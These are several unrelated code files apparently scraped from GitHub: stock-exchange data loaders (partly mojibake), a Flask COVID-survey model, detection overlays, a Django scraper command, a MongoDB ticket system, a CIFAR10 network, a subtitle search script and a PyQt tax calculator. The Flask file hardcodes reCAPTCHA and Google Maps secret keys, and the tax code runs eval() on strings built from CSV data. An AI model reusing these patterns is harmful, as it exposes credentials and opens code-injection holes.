sh, sz, cyb, zxqy, szzb = ShSeDb(), SzSeDb(), CybSeDb(), ZxqySeDb(), SzzbSeDb()
sh = sh.read(columns=[f_sha, f_shb, f_sh])
sh.columns = ['SHA', 'SHB', 'SH']
sz = sz.read(columns=[f_sz])
sz.columns = ['SZ']
cyb = cyb.read([f_cyb])
cyb.columns = ['CYB']
zxqy = zxqy.read([f_zxqy])
zxqy.columns = ['ZXQY']
szzb = szzb.read([f_szzb])
szzb.columns = ['SZZB']
df = pd.concat([sh, sz, cyb, zxqy, szzb, ], axis=1)
df = df.fillna(method='bfill')
return df
@classmethod
def get_pe(cls):
return cls.get_overview_day_field('A_profitRate1', 'B_profitRate1', 'SH_profitRate1',
'่ก็ฅจๅนณๅๅธ็็', 'ๅนณๅๅธ็็(ๅ)', 'ๅนณๅๅธ็็(ๅ)', 'ๅนณๅๅธ็็(ๅ)',)
@classmethod
def get_market_val(cls):
df = cls.get_overview_day_field('A_marketValue1', 'B_marketValue1', 'SH_marketValue1',
                                         '股票总市值（元）', '上市公司市价总值(元)', '上市公司市价总值(元)', '上市公司市价总值(元)',)
df[['SZ', 'CYB', 'ZXQY']] = df[['SZ', 'CYB', 'ZXQY']] / 100000000
return df
@classmethod
def get_negotiable_val(cls):
df = cls.get_overview_day_field('A_negotiableValue', 'B_negotiableValue', 'SH_negotiableValue',
                                         '股票流通市值（元）', '上市公司流通市值(元)', '上市公司流通市值(元)', '上市公司流通市值(元)',)
df[['SZ', 'CYB', 'ZXQY']] = df[['SZ', 'CYB', 'ZXQY']] / 100000000
return df
@classmethod
def get_avg_price(cls):
sh, sz, cyb, zxqy, szzb = self.get_overview_day()
sh_a = sh['A_trdAmt'].apply(
float) * 10000 / sh['A_trdVol'].apply(float)
sh_a.name = 'SHA'
sh_b = sh['B_trdAmt'].apply(
float) * 10000 / sh['B_trdVol'].apply(float)
sh_b.name = 'SHB'
sh_sh = sh['SH_trdAmt'].apply(
float) * 10000 / sh['SH_trdVol'].apply(float)
sh_sh.name = 'SH'
        sz = sz['平均股票价格（元）']
        sz.name = 'SZ'
        cyb = cyb['总成交金额(元)'] / cyb['总成交股数']
        cyb.name = 'CYB'
        zxqy = zxqy['总成交金额(元)'] / zxqy['总成交股数']
        zxqy.name = 'ZXQY'
        szzb = szzb['总成交金额(元)'] / szzb['总成交股数']
        szzb.name = 'SZZB'
df = pd.concat([sh_a, sh_b, sh_sh, sz, cyb, zxqy, szzb, ], axis=1)
return df
def load_old_file():
def read_file(file):
path = os.path.abspath(os.path.dirname(__file__))
df = pd.read_csv(os.path.join(path, file))
df.index = pd.DatetimeIndex(df.date)
del df['date']
return df
ShSeDb().save(read_file('files/se/sh_sse_day_overview.csv'))
SzSeDb().save(read_file('files/se/sz_day_overview.csv'))
CybSeDb().save(read_file('files/se/cyb_day_overview.csv'))
SzzbSeDb().save(read_file('files/se/szzb_day_overview.csv'))
ZxqySeDb().save(read_file('files/se/zxqy_day_overview.csv'))
for key in db.DfDb().keys():
print(key)
|
onecans/my
|
mystockdata/mystockdata/se.py
|
se.py
|
py
| 9,831
|
python
|
en
|
code
| 2
|
github-code
|
6
|
72226014269
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import os
import datetime
from sqlalchemy.dialects.postgresql import ARRAY
app = Flask(__name__)
SECRET_KEY = os.urandom(32)
app.config['SECRET_KEY'] = SECRET_KEY
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///db.sqlite"
app.config['RECAPTCHA_USE_SSL'] = False
app.config['RECAPTCHA_PUBLIC_KEY'] = '6LfkN-EUAAAAAMEUxpQGg7DdGHqhz0eY0_2S5aKu'
app.config['RECAPTCHA_PRIVATE_KEY'] = '6LfkN-EUAAAAADXeLuqzoBOAg0F3f-b_oQEPiSzL'
app.config['RECAPTCHA_OPTIONS'] = {'theme': 'white'}
GOOGLEMAPS_KEY = "AIzaSyAsRuG0NnFmLNZlg6CWUTV8D2FA8gQo5xk"
app.config['GOOGLEMAPS_KEY'] = GOOGLEMAPS_KEY
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
city = db.Column(db.String(100))
state = db.Column(db.String(100))
age = db.Column(db.Integer)
symptoms = db.Column(db.String(), default=[])
ip_address = db.Column(db.String(255))
tested = db.Column(db.String(255))
in_contact = db.Column(db.String(255))
created_date = db.Column(db.DateTime, default=datetime.datetime.utcnow)
coordinates = db.Column(db.String(255))
def __init__(self, city, state, age, symptoms, ip_address, tested, in_contact, coordinates):
self.city = city
self.state = state
self.age = age
self.symptoms = symptoms
self.ip_address = ip_address
self.tested = tested
self.in_contact = in_contact
self.coordinates = coordinates
def __repr__(self):
        return "<User %r>" % self.city
# db.drop_all()
db.create_all()
|
dananguyenucsb/ithinkihavecovid-19
|
model.py
|
model.py
|
py
| 1,606
|
python
|
en
|
code
| 1
|
github-code
|
6
|
20972559660
|
import torch
from tools.image import transforms, cv
from tools.image.index_map import default_map
from tools import tensor
def to_rgb(hex):
return ((hex >> 16) & 255, (hex >> 8) & 255, (hex >> 0) & 255)
def draw_box(image, box, scale=1.0, name=None, confidence=None, thickness=2, color=(255, 0, 0), text_color=None):
text_color = text_color or color
image = cv.rectangle(image, box[:2], box[2:], color=color, thickness=int(thickness * scale))
if not (name is None):
image = cv.putText(image, name, (box[0], box[1] + int(8 * scale)), scale = 0.7 * scale, color=text_color, thickness=int(1*scale))
if not (confidence is None):
str = "{:.2f}".format(confidence)
image = cv.putText(image, str, (box[0], box[3] - 2), scale = 0.7 * scale, color=text_color, thickness=int(1*scale))
return image
def overlay(eval, mode='target', threshold = 0.5, scale=1.0, classes=None):
image = eval.image.clone()
def overlay_prediction():
for detection in eval.detections._sequence():
if detection.confidence < threshold:
break
label_class = classes[detection.label]
draw_box(image, detection.bbox, scale=scale, confidence=detection.confidence, name=label_class.name, color=to_rgb(label_class.colour))
def overlay_target():
for target in eval.target._sequence():
label_class = classes[target.label]
draw_box(image, target.bbox, scale=scale, name=label_class.name, color=to_rgb(label_class.colour))
def overlay_anchors():
overlay_target()
for anchor in eval.anchors:
label_class = classes[anchor.label]
draw_box(image, anchor.bbox, scale=scale, color=to_rgb(label_class.colour), thickness=1)
def overlay_matches():
unmatched = dict(enumerate(eval.target._sequence()))
# print(unmatched)
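        # remove every target that was matched by a detection above the threshold; whatever is left is unmatched and gets flagged below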
for m in eval.matches:
if m.confidence < threshold: break
if m.match is not None:
k, _ = m.match
del unmatched[k]
for (i, target) in enumerate(eval.target._sequence()):
label_class = classes[target.label]
color = (255, 0, 0) if i in unmatched else (0, 255, 0)
draw_box(image, target.bbox, scale=scale, name=label_class.name, color=color)
for m in eval.matches:
if m.confidence < threshold: break
color = (255, 0, 0)
if m.match is not None:
color = (0, 255, 0)
label_class = classes[m.label]
draw_box(image, m.bbox, scale=scale, color=color, confidence=m.confidence, name=label_class.name, thickness=1)
target = {
'matches' : overlay_matches,
'prediction' : overlay_prediction,
'target' : overlay_target
}
if mode in target:
target[mode]()
if eval.debug is not None:
image = cv.blend_over(image, eval.debug)
cv.putText(image, eval.id, (0, int(24 * scale)), scale = 2*scale, color=(64, 64, 192), thickness=int(2*scale))
cv.putText(image, "mAP@0.5 " + str(eval.mAP), (0, int(48 * scale)), scale = 2*scale, color=(64, 64, 192), thickness=int(2*scale))
return image
def overlay_batch(batch, mode='target', scale=1.0, threshold = 0.5, cols=6, classes=None):
images = []
for eval in batch:
images.append(overlay(eval, scale=scale, mode=mode, threshold=threshold, classes=classes))
return tensor.tile_batch(torch.stack(images, 0), cols)
|
oliver-batchelor/detection
|
detection/display.py
|
display.py
|
py
| 3,548
|
python
|
en
|
code
| 0
|
github-code
|
6
|
21712175054
|
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand, CommandError
from optparse import make_option
from ...scraper import Scrap
class Command(BaseCommand):
option_list = BaseCommand.option_list + (make_option(
'--url',
action='store',
dest='url',
        help='URL to scrape'),)
def handle(self, *args, **options):
#try:
Scrap(options.get('url'))
#except:
# raise CommandError('Broken does not exist')
|
jms/FlyNi-API
|
flyni_api/flyni/management/commands/get_data.py
|
get_data.py
|
py
| 500
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73364821308
|
# Read an SRT-style .txt subtitle file, search it for the given keywords, and export the matching timestamps.
"""
1. Read the file
    1.1 Input the type to search (e.g. subtitles)
    1.2 Input the file to search
    1.3 Read the corresponding file
2. Input the text content to search for
    2.1 Search several keywords at the same time
3. Automatically search for the matching content
    3.1 Simultaneous-search v1.0: match each keyword against every subtitle block
4. Output the timestamps of the matching content
    4.1 Aggregate adjacent timestamps
    4.2 Write the corresponding output file
"""
def zimu_time(search_letter_list,file_name,sum_time):
    # 1.0 Read the subtitle file used by this project
    f = open(file_name,"r",encoding='utf-8')
    # 2.1 Search several keywords at the same time.
    pp_list = search_letter_list  # list of keywords to search for
    pp_num = len(pp_list)  # number of keywords to search for
    pp_num_list = [0 for a in range(pp_num)]  # per-keyword match counter
    buffer_form = []  # buffer for the lines of the current subtitle block
    count_txt = 0  # line counter within the current subtitle block
    # per-keyword buffer for the timestamps of matching lines
    buffer_search = []
for search_num in range(pp_num):
buffer_search.append([])
    # 3.1 Simultaneous-search v1.0: match each keyword against every subtitle block
for each_line in f:
if count_txt == 4:
for pp_num_s in range(pp_num):
if pp_list[pp_num_s] in buffer_form[2]:
buffer_search[pp_num_s].append(buffer_form[1])
pp_num_list[pp_num_s] += 1
buffer_form.clear()
count_txt = 0
        # record the current line of this block and advance the counter
buffer_form.append(each_line)
count_txt += 1
    # 4. Output the timestamps of the matching content
    # 4.1 Aggregate adjacent timestamps
    time_stamp_list = time_stamp_polymerization(pp_num,pp_num_list, buffer_search,sum_time)
    #print(time_stamp_list)
    # print(buffer_search,pp_num_list)
    # 4.2 Report the output files
    print('\nSearch finished.\nResults are in the result folder.\nFile name format: subtitle_"keyword"_"match count"')
return time_stamp_list
# 4.1 Timestamp aggregation function
def time_stamp_polymerization(search_number,search_count,buffer_search,sum_time):
time_polymerization_mark_list = []
for letter_number in range(search_number):
time_polymerization_mark = [0 for a in range(search_count[letter_number])]
time_polymerization_mark_list.append(time_polymerization_mark)
    # Parse the subtitle timestamps and mark which neighbouring blocks should be merged
for letter_number in range(search_number):
        # Convert each subtitle timestamp to seconds
buffer_time = [[], []]
buffer_mark_count =1
for timestamp_str in buffer_search[letter_number]:
timestamp_start = int(timestamp_str[0:2]) * 3600 + int(timestamp_str[3:5]) * 60 + int(timestamp_str[6:8])
timestamp_end = int(timestamp_str[-13:-11]) * 3600 + int(timestamp_str[-10:-8]) * 60 + int(
timestamp_str[-7:-5])
#print(timestamp_start,timestamp_end)
buffer_time[0].append(timestamp_start)
buffer_time[1].append(timestamp_end)
        # Mark subtitle timestamps that are close enough to be merged
buffer_time_count = len(buffer_time[0])
# print(buffer_time[0][0],buffer_time[0][1])
if buffer_time_count>=2:
for x in range(1,buffer_time_count):
if buffer_time[0][x] - buffer_time[1][x-1] < sum_time:
# print(buffer_time[1][x-1])
time_polymerization_mark_list[letter_number][x-1] = buffer_mark_count
time_polymerization_mark_list[letter_number][x] = buffer_mark_count
# print(buffer_mark_count)
else:
buffer_mark_count += 1
    # Merge the marked subtitle timestamps
# print(time_polymerization_mark_list)
time_stamp_list = [[] for a in range(search_number)]
for letter_number in range(search_number):
result = {}
for index,kw in enumerate(time_polymerization_mark_list[letter_number]):
if kw not in result.keys():
result[kw] = [index]
else:
result.get(kw).append(index)
for k,v in result.items():
if (len(v) != 1)&(k!=0):
tamp_str = buffer_search[letter_number][v[0]][0:12] + '-->' + buffer_search[letter_number][v[-1]][-13:-2]
time_stamp_list[letter_number].append(tamp_str)
time_stamp_list[letter_number].append(str(len(v))+'\n')
return time_stamp_list
if __name__ == '__main__':
pass
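    # Illustrative sketch (not part of the original script): the keywords and
    # file name below are made-up examples of how zimu_time could be called.
    # keywords = ['hello', 'world', 'python']
    # timestamps = zimu_time(keywords, 'subtitle.txt', sum_time=10)
    # for keyword, stamps in zip(keywords, timestamps):
    #     print(keyword, stamps)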
|
ExplosiveElements/letter_time
|
zimu.py
|
zimu.py
|
py
| 4,494
|
python
|
en
|
code
| 0
|
github-code
|
6
|
8245327650
|
from pymongo import MongoClient
from fastapi import HTTPException
from datetime import datetime
class ModekenSystemManager:
def __init__(self, username, password):
self.client = MongoClient(f'mongodb://{username}:{password}@db.modeken-system.com:27017')
self.db = self.client['modeken-system']
self.collections = self.db['collections']
self.manager = {}
def new(self, item_type):
self.manager[f'{item_type}'] = Manager(self.db[f'tickets-{item_type}'], self.collections, item_type)
if not self.collections.find_one({'item_type': item_type}):
self.collections.insert_one({'item_type': item_type, 'count': 0})
return self.manager[f'{item_type}']
class CollectionManager:
def __init__(self, collections, item_type):
self.collections = collections
self.item_type = item_type
def add_collection(self):
if not self.collections.update_one({'item_type': self.item_type}, {'$inc': {'count':1}}):
raise HTTPException(status_code=500, detail='Internal Server Error')
def get_collection(self):
d = self.collections.find_one({'item_type': self.item_type})
if not d:
raise HTTPException(status_code=500, detail='Internal Server Error')
del d['_id']
del d['item_type']
return d
def reset_collection(self):
if not self.collections.update_one({'item_type': self.item_type}, {'$set': {'count':0}}):
raise HTTPException(status_code=500, detail='Internal Server Error')
class TicketManager:
def __init__(self, tickets):
self.tickets = tickets
self.last_ticket = 0
def get_tickets_wait(self, item_type):
data = []
for i in self.tickets.find({'status': 'wait'}):
del i['_id']
del i['status']
i['item_number'] = item_type + str(i['item_number'])
data.append(i)
return data
def get_tickets_ready(self, item_type):
data = []
for i in self.tickets.find({'status': 'ready'}):
del i['_id']
del i['status']
i['item_number'] = item_type + str(i['item_number'])
data.append(i)
return data
def get_tickets(self):
data = []
for i in self.tickets.find():
del i['_id']
data.append(i)
return data
def to_ready_ticket(self, item_number):
t = self.tickets.find_one({'$and': [{'item_number': item_number}, {'status': 'wait'}]})
if not t:
raise HTTPException(status_code=404, detail=f'Not Found: {item_number}')
time = t['created_time']
return self.tickets.update_one({'$and': [{'item_number': item_number}, {'status': 'wait'}]}, {'$set': {'status': 'ready'}}), time
def to_wait_ticket(self, item_number):
t = self.tickets.find_one({'$and': [{'item_number': item_number}, {'status': 'ready'}]})
if not t:
raise HTTPException(status_code=404, detail=f'Not Found: {item_number}')
time = t['created_time']
return self.tickets.update_one({'$and': [{'item_number': item_number}, {'status': 'ready'}]}, {'$set': {'status': 'wait'}}), time
def cancel_ticket(self, item_number):
t = self.tickets.find_one({'$and': [{'item_number': item_number}, {'status': 'wait'}]})
if not t:
raise HTTPException(status_code=404, detail=f'Not Found: {item_number}')
return self.tickets.update_one({'$and': [{'item_number': item_number}, {'status': 'wait'}]}, {'$set': {'status': 'cancel'}})
def delete_ticket(self, item_number):
t = self.tickets.find_one({'$and': [{'item_number': item_number}, {'status': 'ready'}]})
if not t:
raise HTTPException(status_code=404, detail=f'Not Found: {item_number}')
return self.tickets.update_one({'$and': [{'item_number': item_number}, {'status': 'ready'}]}, {'$set': {'status': 'delete'}})
def add_ticket(self):
self.last_ticket += 1
item_number = self.last_ticket
now = datetime.now().strftime('%H:%M')
data = {'item_number': item_number, 'status': 'wait', 'created_time': now}
if self.tickets.find_one({'item_number': item_number}):
return self.add_ticket()
else:
if not self.tickets.insert_one(data):
raise HTTPException(status_code=500, detail='Internal Server Error')
return item_number, now
def reset_tickets(self):
if not self.tickets.delete_many({}):
raise HTTPException(status_code=500, detail='Internal Server Error')
else:
self.last_ticket = 0
class Manager(CollectionManager, TicketManager):
def __init__(self, tickets, collections, item_type):
CollectionManager.__init__(self, collections, item_type)
TicketManager.__init__(self, tickets)
def delete_ticket(self, item_number):
super().delete_ticket(item_number)
super().add_collection()
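# Illustrative sketch (not part of the original module): rough usage of the
# classes above, assuming a reachable MongoDB instance and made-up credentials.
# system = ModekenSystemManager('user', 'password')
# manager = system.new('A')                  # Manager for tickets of type "A"
# number, created = manager.add_ticket()     # issue a ticket, get (number, time)
# print(manager.get_tickets_wait('A'))       # tickets still in the "wait" state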
|
tochiman/modeken-ticket-system
|
backend/src/mongo.py
|
mongo.py
|
py
| 5,068
|
python
|
en
|
code
| 0
|
github-code
|
6
|
74796405626
|
import torch
import torchvision
from torch import nn
from torch.nn import Sequential, Conv2d, MaxPool2d, Flatten, Linear
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
train_dataset = torchvision.datasets.CIFAR10(root="../dataset_CIFAR10", train=True, download=True,
transform=torchvision.transforms.ToTensor())
test_dataset = torchvision.datasets.CIFAR10(root="../dataset_CIFAR10", train=False, download=True,
transform=torchvision.transforms.ToTensor())
train_dataloader = DataLoader(dataset=train_dataset, batch_size=64, shuffle=True, drop_last=True)
class CIFAR10_Model(nn.Module):
def __init__(self):
super(CIFAR10_Model, self).__init__()
self.model = Sequential(Conv2d(3, 32, 5, stride=1, padding=2),
MaxPool2d(2),
Conv2d(32, 32, 5, stride=1, padding=2),
MaxPool2d(2),
Conv2d(32, 64, 5, stride=1, padding=2),
MaxPool2d(2),
Flatten(),
Linear(1024, 64),
Linear(64, 10))
def forward(self, x):
output = self.model(x)
return output
model1 = CIFAR10_Model()
print(model1)
input = torch.ones(64, 3, 32, 32)
print(input.shape)
output = model1(input)
print(output.shape)
writer = SummaryWriter("../logs/model")
writer.add_graph(model1, input)
writer.close()
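# Illustrative sketch (not part of the original file): a minimal training loop
# wiring the model above to a loss and optimizer; the hyperparameters are made up.
# loss_fn = nn.CrossEntropyLoss()
# optimizer = torch.optim.SGD(model1.parameters(), lr=0.01)
# for images, targets in train_dataloader:
#     optimizer.zero_grad()
#     loss = loss_fn(model1(images), targets)
#     loss.backward()
#     optimizer.step()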
|
ccbit1997/pytorch_learning
|
src/cifar10_model.py
|
cifar10_model.py
|
py
| 1,591
|
python
|
en
|
code
| 0
|
github-code
|
6
|
6250184169
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 19 12:46:12 2018
@author: CTF Team
"""
from PyQt5 import uic,QtCore, QtGui, QtWidgets
from PyQt5.QtCore import QSize, Qt
import CompanyTaxUI
import sys
import pandas as pd
import csv
import numpy as np
class ApplicationWindow(QtWidgets.QMainWindow):
def __init__(self):
super(ApplicationWindow, self).__init__()
self.ui = CompanyTaxUI.Ui_MainWindow()
self.ui.setupUi(self)
# Connects the calculate button in CompanyTaxUI to CompanyTaxSavingsApp.py
self.ui.calculate.clicked.connect(self.taxCalculate)
def taxCalculate(self):
# Gets the string input from company_netIncome
companySGDIncome = self.ui.company_netIncome.text()
# Checks if companySGDIncome is empty
if not companySGDIncome:
self.ui.list_top10.setColumnCount(1)
self.ui.list_top10.setHorizontalHeaderLabels(["Output"])
self.ui.list_top10.setRowCount(1)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeader().setSectionResizeMode(0, QtWidgets.QHeaderView.ResizeToContents)
self.ui.list_top10.setItem(0 , 0, QtWidgets.QTableWidgetItem("You have not inputted any SGD Net Income !"))
else:
# Gets the category input from list_companyindustry
selectedCategoryData = self.ui.list_companyindustry.currentText()
calCountriesTaxAmt = ApplicationWindow.taxComputation(companySGDIncome, selectedCategoryData)
# Gets the option 1 - 5 to indicate the option to generate the tax output
if self.ui.option1.isChecked():
# Filter countries that have 0% tax rates for the respective tax rates
# Looking at 0 index value for national + branch rate
filteredCountries1 = {k:v for k, v in calCountriesTaxAmt.items() if v[0] > 0}
minimumTaxCountry1 = min(filteredCountries1.items(), key = lambda x : x[1][0])
                # Set ui list to the following parameters for the required output for option 1
self.ui.list_top10.setColumnCount(3)
self.ui.list_top10.setHorizontalHeaderLabels(["Country", "Tax Amount", "Tax Option #"])
self.ui.list_top10.setRowCount(1)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(1).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(2).setTextAlignment(Qt.AlignLeft)
# Setting output for option 1
self.ui.list_top10.setItem(0 , 0, QtWidgets.QTableWidgetItem(minimumTaxCountry1[0]))
value = '%.3f' % minimumTaxCountry1[1][0]
self.ui.list_top10.setItem(0 , 1, QtWidgets.QTableWidgetItem(value))
self.ui.list_top10.setItem(0 , 2, QtWidgets.QTableWidgetItem("Tax Option 1"))
elif self.ui.option2.isChecked():
# Looking at index 1 value for min tax
filteredCountries2 = {k:v for k, v in calCountriesTaxAmt.items() if v[1] > 0}
minimumTaxCountry2 = min(filteredCountries2.items(), key = lambda x: x[1][1])
self.ui.list_top10.setColumnCount(3)
self.ui.list_top10.setHorizontalHeaderLabels(["Country", "Tax Amount", "Tax Option #"])
self.ui.list_top10.setRowCount(1)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(1).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(2).setTextAlignment(Qt.AlignLeft)
# Setting output for option 2
self.ui.list_top10.setItem(0 , 0, QtWidgets.QTableWidgetItem(minimumTaxCountry2[0]))
value = '%.3f' % minimumTaxCountry2[1][1]
self.ui.list_top10.setItem(0 , 1, QtWidgets.QTableWidgetItem(value))
self.ui.list_top10.setItem(0 , 2, QtWidgets.QTableWidgetItem("Tax Option 2"))
elif self.ui.option3.isChecked():
# Looking at index 2 value for progressive tax
filteredCountries3 = {k:v for k, v in calCountriesTaxAmt.items() if v[2] > 0}
minimumTaxCountry3 = min(filteredCountries3.items(), key = lambda x: x[1][2])
self.ui.list_top10.setColumnCount(3)
self.ui.list_top10.setHorizontalHeaderLabels(["Country", "Tax Amount", "Tax Option #"])
self.ui.list_top10.setRowCount(1)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(1).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(2).setTextAlignment(Qt.AlignLeft)
# Setting output for option 3
self.ui.list_top10.setItem(0 , 0, QtWidgets.QTableWidgetItem(minimumTaxCountry3[0]))
value = '%.3f' % minimumTaxCountry3[1][2]
self.ui.list_top10.setItem(0 , 1, QtWidgets.QTableWidgetItem(value))
self.ui.list_top10.setItem(0 , 2, QtWidgets.QTableWidgetItem("Tax Option 3"))
elif self.ui.option4.isChecked():
# Looking at index 3 value for category tax
filteredCountries4 = {k:v for k, v in calCountriesTaxAmt.items() if v[3] > 0}
# If Category is not inputted
if bool(filteredCountries4) == False :
self.ui.list_top10.setColumnCount(1)
self.ui.list_top10.setHorizontalHeaderLabels(["Output"])
self.ui.list_top10.setRowCount(1)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeader().setSectionResizeMode(0, QtWidgets.QHeaderView.ResizeToContents)
self.ui.list_top10.setItem(0 , 0, QtWidgets.QTableWidgetItem("You have not chosen any category !"))
# Else shows the category data
else:
minimumTaxCountry4 = min(filteredCountries4.items(), key=lambda x: x[1][3])
self.ui.list_top10.setColumnCount(3)
self.ui.list_top10.setHorizontalHeaderLabels(["Country", "Tax Amount", "Tax Option #"])
self.ui.list_top10.setRowCount(1)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(1).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(2).setTextAlignment(Qt.AlignLeft)
# Setting output for option 4
self.ui.list_top10.setItem(0 , 0, QtWidgets.QTableWidgetItem(minimumTaxCountry4[0]))
value = '%.3f' % minimumTaxCountry4[1][3]
self.ui.list_top10.setItem(0 , 1, QtWidgets.QTableWidgetItem(value))
                    self.ui.list_top10.setItem(0 , 2, QtWidgets.QTableWidgetItem("Tax Option 4"))
elif self.ui.option5.isChecked():
# Loops through calCountrieTaxAmt and store least tax amount and index as a tuple for key countryName
topTenCountriesLowestTaxes = {}
for value in calCountriesTaxAmt.items():
val = min((x for x in value[1] if x > 0), default = 0)
index = value[1].index(val)
topTenCountriesLowestTaxes[value[0]] = (val,index)
# Filters countries with 0 values
filteredCountries5 = {k:v for k, v in topTenCountriesLowestTaxes.items() if v[0] > 0}
minimumTaxCountry5 = sorted(filteredCountries5.items(), key=lambda x:x[1])
self.ui.list_top10.setColumnCount(3)
self.ui.list_top10.setHorizontalHeaderLabels(["Country", "Tax Amount", "Tax Option #"])
self.ui.list_top10.setRowCount(10)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(1).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(2).setTextAlignment(Qt.AlignLeft)
# Setting the top 10 least minimum tax and their options onto the output
for row in range(10):
self.ui.list_top10.setItem(row, 0, QtWidgets.QTableWidgetItem(minimumTaxCountry5[row][0]))
value = '%.3f' % minimumTaxCountry5[row][1][0]
self.ui.list_top10.setItem(row , 1, QtWidgets.QTableWidgetItem(value))
option = minimumTaxCountry5[row][1][1] + 1
option = "Tax Option " + '%.f' % + option
self.ui.list_top10.setItem(row, 2, QtWidgets.QTableWidgetItem(option))
# Convert SGD Net Income to USD Net Income
def convertSGDToUSD(companySGDIncome):
usdIncome = companySGDIncome * 0.75
return usdIncome
# Generate dictionary with key as Country and tuple with 4 spaces containing the different tax rates
def generateTaxForOptions(taxData, companyUSDIncome, companyCode):
countryTaxAmount = {}
for row in taxData.itertuples(index=False, name="None"):
# Initialize 4 taxes amount to be stored
# 1st tax amount is normal rate + branch rate
# 2nd tax amount is minimum tax rate
# 3rd tax amount is progressive tax rate
# 4th tax amount is pertaining to the specific type of industry
differentTaxAmount = [0,0,0,0]
# 1st Tax
# Finding the tax in USD for tax amount # 1 with normal rate + branch rate
differentTaxAmount[0] = round(companyUSDIncome * (row[1] + row[8]), 3)
# 2nd Tax
# Find the tax in USD for tax amount # 2 with minimum tax rate
differentTaxAmount[1] = round(companyUSDIncome * (row[4]), 3)
# 3rd Tax
# If native currency is not in USD, find the tax in USD and convert to native currency for progressive tax computation
nativeCurrency = companyUSDIncome
if row[2] != "USD":
nativeCurrency = (1.0 / row[3]) * nativeCurrency
# Evaluates for fields that are not empty in ProgressiveTaxRate
if row[7]:
# Split by , for progressive tax condition
progressiveTax = row[7].split(',')
# For loop inside the progressiveTax and split by white space
conditionStatement = [x.split() for x in progressiveTax]
# For loop through the condition statement for each list of conditions
for x in conditionStatement:
# If value is present, break out of loop
valuePresent = False
# Round off native currency to 3 decimal places and declare it as a string
roundedNativeCurrency = round(nativeCurrency, 3)
strRoundedNativeCurrency = '%.3f' % roundedNativeCurrency
# Use if condition to check for the length of the list of conditionStatement
if len(x) == 5:
# Evaluate the conditions before final statement
lowerBound = x[0]
evaluationCondition = x[1]
upperBound = x[2]
taxPercentage = x[4]
# Use eval function to test the test case
lowerBoundStatement = "> " + lowerBound
upperBoundStatement = evaluationCondition + " " + upperBound
# 1st condition to check if figure is bigger than amount
lowerCondition = strRoundedNativeCurrency + " " + lowerBoundStatement
# 2nd condition to check if figure is smaller than or equal to amount
upperCondition = strRoundedNativeCurrency + " " + upperBoundStatement
# Checks if 1st and 2nd condition is fulfilled to know if nativeCurrency falls within this range
if (eval(lowerCondition)) and (eval(upperCondition)):
nativeCalculatedTax = roundedNativeCurrency * float(taxPercentage)
# Calculate back the amount in USD
USDCalTax1 = nativeCalculatedTax * (row[3])
USDCalTax1 = round(USDCalTax1, 3)
# Assign the CalTax into differentTaxAmount
differentTaxAmount[2] = USDCalTax1
valuePresent = True
break
if (valuePresent == True):
break
elif len(x) == 4:
# Evaluate the conditions for final statement
lastEvaluationCondition = x[0]
lastLowerBound = x[1]
lastTaxPercentage = x[3]
# last condition to check if figure is bigger than last lower bound
lastLowerBoundStatement = lastEvaluationCondition + " " + lastLowerBound
# Adding strRoundedNativeCurrency to lastCondition
lastCondition = strRoundedNativeCurrency + " " + lastLowerBoundStatement
# Checks if last condition is fulfilled
if eval(lastCondition):
nativeCalculatedTax = roundedNativeCurrency * float(lastTaxPercentage)
# Calculate back the amount in USD
USDCalTax2 = nativeCalculatedTax * (row[3])
USDCalTax2 = round(USDCalTax2, 3)
# Assign the CalTax into differentTaxAmount
differentTaxAmount[2] = USDCalTax2
valuePresent = True
break
# 4th Tax
# Calculates the tax amount if categoryTaxCondition1 fulfils the companyCode defined by the user
if row[9]:
if "," in row[9]:
# Split the string by , to get the string statement out
categoryStatement1 = row[9].split(',')
# For loop inside the categoryStatement and split by white space
categoryTaxCondition1 = [x.split() for x in categoryStatement1]
# For loop inside the tuple and retrieve dictCode for comparison and multiplication by assigned tax rate if it matches
for x in categoryTaxCondition1:
dictCode1 = x[0]
categoryTax1 = x[2]
if (companyCode == dictCode1):
categoryTaxAmount1 = companyUSDIncome * float(categoryTax1)
differentTaxAmount[3] = categoryTaxAmount1
break
# For loop inside the tuple and multiply by taxRate if it matches
else:
# Account for countries with only 1 type of category special tax rate
categoryTaxCondition2 = row[9].split()
dictCode2 = categoryTaxCondition2[0]
categoryTax2 = categoryTaxCondition2[2]
if (companyCode == dictCode2):
categoryTaxAmount2 = companyUSDIncome * float(categoryTax2)
differentTaxAmount[3] = categoryTaxAmount2
# Assigning the countryName as key, the differentTaxAmount tuple as the value
countryTaxAmount[row[0]] = differentTaxAmount
return countryTaxAmount
# Generate dictionary with key as CategoryName and value as 3 characters code for category
def generateCategoryData(categoryData):
# Use list comprehension to assign key and data to categoryDict
categoryDict = {x['CategoryName']: x['CategoryCode'] for x in categoryData.to_dict(orient="records")}
return categoryDict
def taxComputation(companySGDIncome, selectedCategoryData):
# Load csv data into pandas and na values are not being evaluated as NaN
